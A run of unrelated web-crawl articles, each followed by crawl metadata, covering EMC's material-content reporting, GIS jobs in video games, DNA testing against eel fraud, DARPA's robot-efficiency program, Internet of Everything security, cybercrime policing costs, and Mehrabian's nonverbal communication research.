Compiling this database is complex due to the vast number of parts in our hardware products, the constant evolution of our product portfolio, and the maturity level of each supplier’s ability to report FMD. We continue to gather this information from our suppliers, adding data for our new products and backfilling data from our older product releases.
MEETING COMPLIANCE AND CUSTOMER REQUIREMENTS
As interest in reducing the environmental impact of IT products has grown, regulations on product material content worldwide have followed. There has also been an increase in requests for information from our customers about specific substances in our products. The initiatives mentioned above are critical to our efforts to stay ahead of government regulations and customer desires, but the proliferation of regulations and the lack of global harmonization can be a challenge. EMC has a governance body that oversees environmental product compliance and regularly anticipates and communicates requirements to our engineering organization and supply chain. In 2013, we plan to further educate our suppliers to help them understand and prepare for the quickly changing regulatory landscape. | <urn:uuid:5cf12e1e-6858-42cf-8b87-7f0863fd95e6> | CC-MAIN-2017-09 | https://www.emc.com/corporate/sustainability/sustaining-ecosystems/material-content.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170696.61/warc/CC-MAIN-20170219104610-00646-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.920082 | 1,113 | 3.078125 | 3 |
Geographic information systems professionals have been seeing an increase in career opportunities lately -- from working on map-focused products such as Esri’s CityEngine and Google Earth to helping the public sector with its geospatial needs.
But now, a new avenue has opened up in the world of GIS: video games. Many games have begun to feature complex interactive maps, as seen in Grand Theft Auto V, which has blown away gamers with its attention to detail, and Call of Duty: Ghosts, where multiplayer maps play an important role. Other games such as SimCity allow you to build your own world.
"Whether it is introducing an improved user experience for games or creating more dynamic public spaces for our citizens to enjoy, there are so many ways in which GIS data can be leveraged to improve the world,” Stephen McElroy, GIS program chair at American Sentinel University, said in a statement. “3-D environments that simulate the real world help us to understand and plan sustainable environments."
If you're a GIS professional looking for a job, gaming is one route to consider. | <urn:uuid:333db765-1ff7-4b3a-96d0-5971f1606dc1> | CC-MAIN-2017-09 | http://www.nextgov.com/cio-briefing/wired-workplace/2014/08/mapping-out-video-games/91793/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171629.92/warc/CC-MAIN-20170219104611-00522-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.949258 | 229 | 2.515625 | 3 |
A science institute in central Japan says it has devised a system to stop eel fraud using cheap DNA testing, as the summer surge in the foodstuff's popularity approaches amid a scarce local catch.
Eel caught locally is much more expensive than imports, due to trade restrictions and the declining numbers available on the market, and in recent years fraud has become an issue. Consumers are rarely able to tell the difference, but advances in DNA testing, which put most of the key technology on a single chip, have made such tests faster and more affordable.
Current DNA sequencing chips incorporate existing technologies such as CMOS sensors, based on the same technology as digital cameras, and prices for sequencing are falling. The cost of sequencing a human-sized genome has fallen into the thousands of dollars since the Human Genome Project was completed in 2003 at a cost of billions.
The slender, snaky fish are often served "kabayaki" style during the summer, cooked in thin slices with a sweet sauce. The traditional dish is thought to help avoid fatigue associated with Japan's hot, humid summer climate, and every year demand surges, increasing the chance of fraud.
"In the past tests had to check each eel individually, which costs 20,000 to 30,000 yen," said Toshihiro Tsuneyoshi, a professor and eel specialist at Shizuoka Institute of Science and Technology, where the test was developed. "This system can drive costs down to 20 or 30 yen per eel."
The Shizuoka Institute of Science and Technology said it can simultaneously test small tissue samples from thousands of eels, greatly reducing the cost and time required for testing. If a non-local eel is found in a batch, more tests will be performed to find the guilty foreigner, but as such cases are currently rare, costs should remain low, Tsuneyoshi said. The university used testing equipment from California-based Life Technologies.
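The economics come down to spreading a roughly fixed sequencing-run cost across many pooled samples. The sketch below is illustrative only: the individual-test and per-eel figures come from the quotes above, while the fixed run cost and batch size are assumed values chosen for illustration.

```python
# Illustrative arithmetic for batch DNA testing of eels.
# Per-eel figures come from the quotes above; run cost and batch size are assumptions.
INDIVIDUAL_TEST_YEN = 25_000      # midpoint of the quoted 20,000-30,000 yen per eel
BATCH_RUN_COST_YEN = 75_000       # assumed fixed cost of one pooled sequencing run
BATCH_SIZE = 3_000                # "thousands of eels" tested simultaneously

per_eel_batched = BATCH_RUN_COST_YEN / BATCH_SIZE
print(f"Individual testing: {INDIVIDUAL_TEST_YEN:,} yen per eel")
print(f"Batched testing:    {per_eel_batched:,.0f} yen per eel")  # ~25 yen, in line with the 20-30 yen claim
```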
He said a similar system can also be used for other expensive foods where consumers can be easily duped, such as pricier cuts of tuna.
For now, concerned connoisseurs will have to rely on tests done by government inspectors, but DNA sequencing capabilities are already starting to appear in pocket-sized devices for other applications. | <urn:uuid:7980a100-62d2-44e7-bd39-1085af50fa50> | CC-MAIN-2017-09 | http://www.cio.com/article/2397928/fraud/japanese-university-to-battle-eel-fraud-with-cheap--rapid-dna-testing.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171932.64/warc/CC-MAIN-20170219104611-00046-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.961584 | 461 | 3.109375 | 3 |
The Department of Defense is asking for help in building more energy-efficient robots.
The government's Defense Advanced Research Projects Agency (DARPA) has issued a notice looking for research proposals for its Maximum Mobility and Manipulation (M3) project, a program that launched last year. Through the M3 program, Defense Department officials are looking to improve all aspects of robot creation and operations, from better manufacturing processes to enhanced performance, better controls and greater mobility.
Within this program is the M3 Actuation effort, through which DARPA officials want to see a 2,000 percent (roughly 20-fold) improvement in the efficiency of power transmission and use in robots, with the eventual goal of expanding what the robots can do.
The Defense Department sees a broad range of applications for robots, from machines that drive into an industrial disaster area and shut off valves leaking toxic steam to robots that can disarm roadside bombs to a robot that can carry hundreds of pounds of equipment over rocky terrain. The problem, according to DARPA, is that robots now are very inefficient, so they can't be used in such situations.
"Humans and animals have evolved to consume energy very efficiently," DARPA officials said in a July 3 statement. "Bones, muscles and tendons work together for propulsion using as little energy as possible. If robotic actuation can be made to approach the efficiency of human and animal actuation, the range of practical robotic applications will greatly increase and robot design will be less limited by power plant considerations."
DARPA officials are hoping that with outside help, they can greatly improve on the efficiency of robots. They figure it will take input from people and organizations from an array of scientific and engineering specialties, from low-loss power modulation and high-bandwidth variable impedance matching to gravitational load cancellation and high-efficiency power transmission between joints.
The M3 Actuation program will run on two tracks, according to DARPA. The first aims to develop high-efficiency actuation technology that would give robots similar to the DARPA Robotics Challenge (DRC) platform 20 times the endurance of the current DRC machines when running untethered from a power source. Today those robots can operate for only about 10 to 20 minutes, so a 20-fold gain would translate to several hours of untethered operation.
The second track will be to work at improving the efficiency of robots that are both larger and smaller than those in the DRC program.
The M3 Actuation program will run in parallel with the DRC. The second track is more theoretical than the first. Participants in both tracks will share their design approaches at the first DRC live competition, scheduled for December 2013. Robots from the first track will be demonstrated, though they will not compete, at the second DRC competition in December 2014, according to DARPA officials.
This vendor-written tech primer has been edited by Network World to eliminate product promotion, but readers should note it will likely favor the submitter’s approach.
The Internet of Everything’s (IoE) promise to create a more connected and transformed world comes closer to reality on a daily basis. Cisco predicts that 50 billion devices will be connected by the year 2020. But as devices bridge the physical and digital worlds, security challenges arise.
The ultimate goal of IoE is to increase operational efficiency, power new business models and improve quality of life. As IoE becomes a reality, organizations will bring more and more devices from disparate suppliers into their network. Cybersecurity models need to radically change to provide the right level of protection for this new, connected world.
The number and diversity of connected devices and associated applications are so large, and growing so fast, that the very foundation of many of our cybersecurity assumptions is being challenged. It is therefore imperative that security models change to integrate broad-based network visibility and big data collection, leveraged through correlation, context, and dynamically applied controls. In essence, this makes the network a giant sensor, providing the depth of visibility needed to take informed security action and protect against all attack vectors.
New threat models in the connected world
The most compelling argument for making the network a giant sensor is the set of potential threat models that already exists. For example, imagine an office with power switches that associate to wireless access points. An attacker sitting in the parking lot could potentially control all of the electrical outlets associated with those wireless access points. The attacker could turn off the lights or power down HVAC systems. Now imagine such an event happening in a hospital operating room during surgery. It’s about more than just theft or service disruption.
The billions of new devices connected through IoE enlarge the attack surface, and the variety of objects and the new ways they interact give adversaries a considerably more diverse set of targets.
The Internet of Everything will inevitably involve a great number of endpoints with not only poor security posture, but also poorly written protocol implementations from OSI Layers 2 through 7. These low-margin commodity devices will contain minimal features and use the lowest-cost hardware and software. As attacks against newer wireless technologies such as Bluetooth and Near Field Communication increase, we can see what is on the horizon for early implementations of IoE.
Thus, the Internet of Everything generates an evolving threat model. Malicious actors are quite creative in coming up with new and unexpected ways to exploit systems and cause damage. It is more important than ever to build additional security capabilities into the network.
Adapting to today’s threat environment
Just as criminal adversaries and threats constantly adapt and evolve, the same is true for security organizations responsible for countering these threats.
By taking a threat-centric, “network as a sensor” approach, IT security teams can leverage mobile, cloud and IoE endpoints in new ways to increase transparency and build actionable information.
The right model for IoE security will enable organizations to enjoy the benefits of IoE while maintaining a high level of data privacy and protection and ensuring reliable, uninterrupted service delivery. The model consists of three pillars that connect with one another—visibility, threat awareness, and action.
With visibility, we have a real-time, accurate picture of devices, data, and the relationships between them, scaling our ability to make sense of billions of devices, applications, and their associated information. This requires true automation and analytics; humans won’t be able to scale with the environment.
Threat awareness accepts that the perimeter is amorphous and presumes compromise; it hones our ability to identify threats by understanding normal and abnormal behavior, spot indicators of compromise, make decisions, and respond rapidly. This requires overcoming complexity and fragmentation in our environments. Once we identify a threat or anomalous behavior, we need to take action. This requires the right technologies, processes and people working together—and swiftly—to be effective.
Moving towards fully predictive infrastructure that changes in anticipation of potential threats isn’t easy, but it’s necessary. To do so, security teams need to get creative. Currently, it’s too expensive and too unwieldy to monitor every single east-west network connection. Security teams are dependent, therefore, on devices that emit data that can be consumed by another device. The goal is to embed security visibility and control into as many devices under IT’s control as possible and combine this with current network policies, making the network a vast, extensible sensor.
Clearing the Fog
Fog computing models describe one way to address this IoE scale problem. The “fog computing” term comes from the meteorological effect of fog as a layer between the ground (IoE sensors) and clouds (cloud computing). This model addresses the IoE scale problem by inserting a gateway between a set of IoE sensors and the data center that gathers data from multiple devices. It then performs initial filtering and correlation before sending higher-order data to the cloud. This fog layer could analyze and correlate events across multiple IoE sensors and identify vulnerabilities. It could then mitigate by ignoring the compromised device and instructing the neighboring sensors to do the same.
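As a rough illustration of the fog-gateway pattern described above (local filtering and correlation, with only higher-order data forwarded to the cloud), the following Python sketch is a simplified model rather than code from any real IoE platform; the sensor format, anomaly rule, and quarantine mechanism are all assumptions.

```python
# Simplified model of a fog gateway between IoE sensors and the cloud.
# The sensor format, anomaly rule, and quarantine mechanism are illustrative assumptions.
from statistics import median

quarantined = set()    # sensors the gateway has decided to stop trusting
cloud_uplink = []      # compact, higher-order records forwarded to the data center

def ingest(batch):
    """batch: list of (sensor_id, reading) tuples collected from nearby sensors."""
    readings = [(sid, val) for sid, val in batch if sid not in quarantined]
    if not readings:
        return
    med = median(val for _, val in readings)
    for sid, val in readings:
        # Correlate across neighbors: a reading far from the batch median marks that sensor as suspect.
        if abs(val - med) > 10 * max(abs(med), 1.0):
            quarantined.add(sid)   # mitigate locally by ignoring the device from now on
    kept = [val for sid, val in readings if sid not in quarantined]
    # Forward only a summary, not every raw reading, to the cloud.
    cloud_uplink.append({"median": median(kept) if kept else None,
                         "sensors": len(kept),
                         "quarantined": sorted(quarantined)})

ingest([("s1", 21.0), ("s2", 20.5), ("s3", 400.0)])   # s3 behaves anomalously
print(cloud_uplink[-1])
```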
As IoE devices proliferate and the processing power of network switches and routers increases, the industry will eventually move to fog computing in the network in order to scale. While the majority of organizations have critical controls available, they lack the visibility and intelligence needed to update them. The market is shifting to incorporate higher levels of intelligence in the infrastructure, and the ultimate goal is to achieve an environment that is fully predictive and able to use machine-learning algorithms to improve efficiency and security. While security will never be fully automated, moving toward fog computing can result in broad visibility that helps preempt threats with cloud- and network-based intelligence.
In light of security threats that have already occurred during the first blush of the era of IoE – as well as those that have yet to be realized – organizations must consider how they will defend their data and their customers. Enterprises are seeking ways to access the local and global intelligence they need and combine this information with the right context for making informed decisions and taking action. To do so, they should focus on what is still within their control – network-connected devices – and use them as sensors. A threat-centric “network as a sensor” approach can therefore be used to capture data that highlights methods by which the malicious actor—external or internal—is achieving his or her goals. IT security teams can then more quickly detect and mitigate threats.
This story, "Security for the Internet of Everything: Turning the network Into a giant sensor" was originally published by Network World. | <urn:uuid:3b386ee1-b876-4475-9c5d-59adccdf3f2c> | CC-MAIN-2017-09 | http://www.itnews.com/article/2913595/internet-of-things/security-for-the-internet-of-everything-turning-the-network-into-a-giant-sensor.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171932.64/warc/CC-MAIN-20170219104611-00046-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.940011 | 1,383 | 2.609375 | 3 |
Improving the ability of law enforcement agencies to catch cybercriminals should be a priority when governments decide how their cybersecurity budgets get spent, according to University of Cambridge security engineering professor Ross Anderson.
Anderson is one of seven computer researchers from the U.K., Germany, the Netherlands and the U.S. who recently performed an analysis of the costs of cybercrime at the request of the U.K. Ministry of Defence. Their findings were published in a research paper that will be presented on June 26 at the 11th Annual Workshop on the Economics of Information Security in Berlin.
The researchers split the costs of computer crimes into direct losses, indirect losses and costs associated with defending against those crimes in the future.
The defense costs stem from acquiring cybersecurity software like antivirus and firewall programs, offering fraud prevention services to consumers, implementing fraud detection systems and performing law enforcement investigations.
The study found that for more traditional crimes like tax and welfare fraud, which are increasingly performed with the help of computers, the defense costs are much lower than the amounts being stolen, which makes sense from an investment perspective.
However, for Internet-based crimes like hacking, denial of service attacks, online scams, phishing, spam and others, the defense costs are many times higher than the actual losses.
Anderson gave the example of a cybercriminal gang that ran a botnet responsible for a third of the world's spam traffic in 2010. It's estimated that this gang made less than US$3 million from their spam operation and yet, the worldwide cost of stopping spam was estimated at around $1 billion, he said.
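Taking those estimates at face value gives a back-of-the-envelope sense of the imbalance:

\[
\frac{\text{worldwide cost of stopping spam}}{\text{gang revenue}} \approx \frac{\$1{,}000\ \text{million}}{\$3\ \text{million}} \approx 330,
\]

that is, on the order of several hundred dollars spent on defense for every dollar the spammers earned. The figures are only the estimates quoted above, so the ratio should be read as an illustration, not a precise measurement.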
There are multiple reasons for this discrepancy, but one of them has to do with the lack of law enforcement action against cybercriminals, the researchers said in their paper. "The straightforward conclusion to draw on the basis of the comparative figures collected in this study is that we should perhaps spend less in anticipation of computer crime (on antivirus, firewalls etc.) but we should certainly spend an awful lot more on catching and punishing the perpetrators."
"A lot of Internet crimes are perpetrated by only a small number of gangs," Anderson said. Current methods of dealing with cybercrime are inefficient, Anderson said, adding, "I think it's because many policemen think it's too hard."
The fact that many of these gangs are located in countries where cybercrime legislation is lacking or not strongly enforced should not necessarily be an impediment for law enforcement action, Anderson said. "There have been some gangs from Russia and the Ukraine who have been arrested after pressure from the British government."
"The problem at the moment is that there seems to be a very low priority for police cooperation," Anderson said. "If the governments of Britain, Germany, France, the U.S. and so on, were to make it a higher priority then the government of Russia would start to crack down on these gangs."
Western governments can also fight cybercrime by pressuring credit card companies like Visa and MasterCard into banning banks that process payments for cybercriminals from their networks, Anderson said. "For example, almost all payments for fake Viagra go through only three banks."
The U.S. government has already demonstrated its ability to do this in 2010 when it pressured Visa and MasterCard into blocking credit card donations for WikiLeaks, the researcher said. "In the same way the banking system can be pressured into stopping processing payments for criminals."
There are particular types of cybercriminals that law enforcement agencies should aggressively target; for example, the people who write hacking tools and malware, Anderson said. In the future, law enforcement should be the priority when governments allocate more money to cybersecurity, he said.
Last year, the U.K. government allocated an extra £640 million (US$1 billion) to cybersecurity, but it gave around £400 million of this money to the U.K. Government Communications Headquarters (GCHQ), a technical surveillance agency, and only about £15 million to the police, Anderson said.
"This is a bad outcome," he said. "The police should have gotten many tens of millions of pounds so they could improve forensics, improve enforcement and improve their technological capabilities in general." | <urn:uuid:3f00298c-4a73-4b9c-a843-2eb7cc157174> | CC-MAIN-2017-09 | http://www.cio.com/article/2394939/cybercrime/governments-should-invest-more-in-catching-cybercriminals--researchers-say.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170434.7/warc/CC-MAIN-20170219104610-00166-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.967794 | 858 | 2.71875 | 3 |
In 1967, the Journal of Consulting Psychology published a study conducted by two researchers that would eventually shape the way we understand the importance of nonverbal communication. Written by UCLA professor Albert Mehrabian and Susan R. Ferris, the piece described the relative importance of words, tone of voice and body language in understanding an underlying emotional message. But more on this in a minute. First, we need to understand what nonverbal communication is.
As the name implies, nonverbal communication accounts for practically everything that isn’t the words used in communication. Eye contact, gestures, inflection, dress and proximity all play important but subtle roles in determining our understanding of a person’s meaning. Without these indicators, the totality of a person’s statement is impossible to interpret. Dr. Mehrabian suspected precisely that when he began conducting his experiments in the mid-1960s. In one, subjects were given three recordings of the word “maybe” – one to convey disfavor, one to convey favor and one to convey neutrality. They were then shown photos of female faces expressing the same three emotions and were told to determine the emotions of both the recordings and the photos. The subjects more accurately guessed the emotion conveyed in the photos by a margin of 3:2.
In a second study, Dr. Mehrabian’s subjects listened to recordings of nine words. Three were designed to convey affinity (“honey,” “thanks” and “dear”), three were meant to convey neutrality (“oh,” “really” and “maybe”) and three conveyed dislike (“don’t,” “terrible” and “brute”). The recordings were of speakers reading each word three times, each with a different tone: positive, neutral and negative. The result? A subject’s response to each word depended more on the inflection of the voice than on the connotation of the word itself. These studies led Dr. Mehrabian to devise a formula to describe how the mind determines meaning: the interpretation of a message is 7 percent verbal, 38 percent vocal and 55 percent visual; in other words, 93 percent of communication is “nonverbal” in nature.
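The commonly cited form of that weighting can be written as a simple linear combination. Note that Mehrabian derived it only for messages about feelings and attitudes, and the equation below is the popular summary rather than a formula quoted from the 1967 paper:

\[
\text{perceived attitude} \;\approx\; 0.07 \times \text{verbal} \;+\; 0.38 \times \text{vocal} \;+\; 0.55 \times \text{facial},
\qquad 0.38 + 0.55 = 0.93 .
\]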
The implications for business communication are clear, since so much of sales, marketing and management comes down to effective communication. Companies that conduct business primarily by phone are leaving 55 percent of their message open to misinterpretation, while companies that run on email are leaving a staggering 93 percent on the table. Imagine the money that’s being thrown away because of inefficiency and miscommunication.
Video conferencing ensures that no inflection is missed or gesture left misinterpreted, because it engages all three aspects of communication in the same format. It puts you totally in control of shaping your message and effectively communicating it to clients, colleagues and business partners, eliminating virtually all room for miscommunication. At the end of the day, can you afford to leave 93 percent of your company’s message to chance? | <urn:uuid:69e95b78-daf7-40f1-8b88-d2e4e163f9f5> | CC-MAIN-2017-09 | http://www.lifesize.com/video-conferencing-blog/speaking-without-words/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170434.7/warc/CC-MAIN-20170219104610-00166-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.94708 | 640 | 3.4375 | 3 |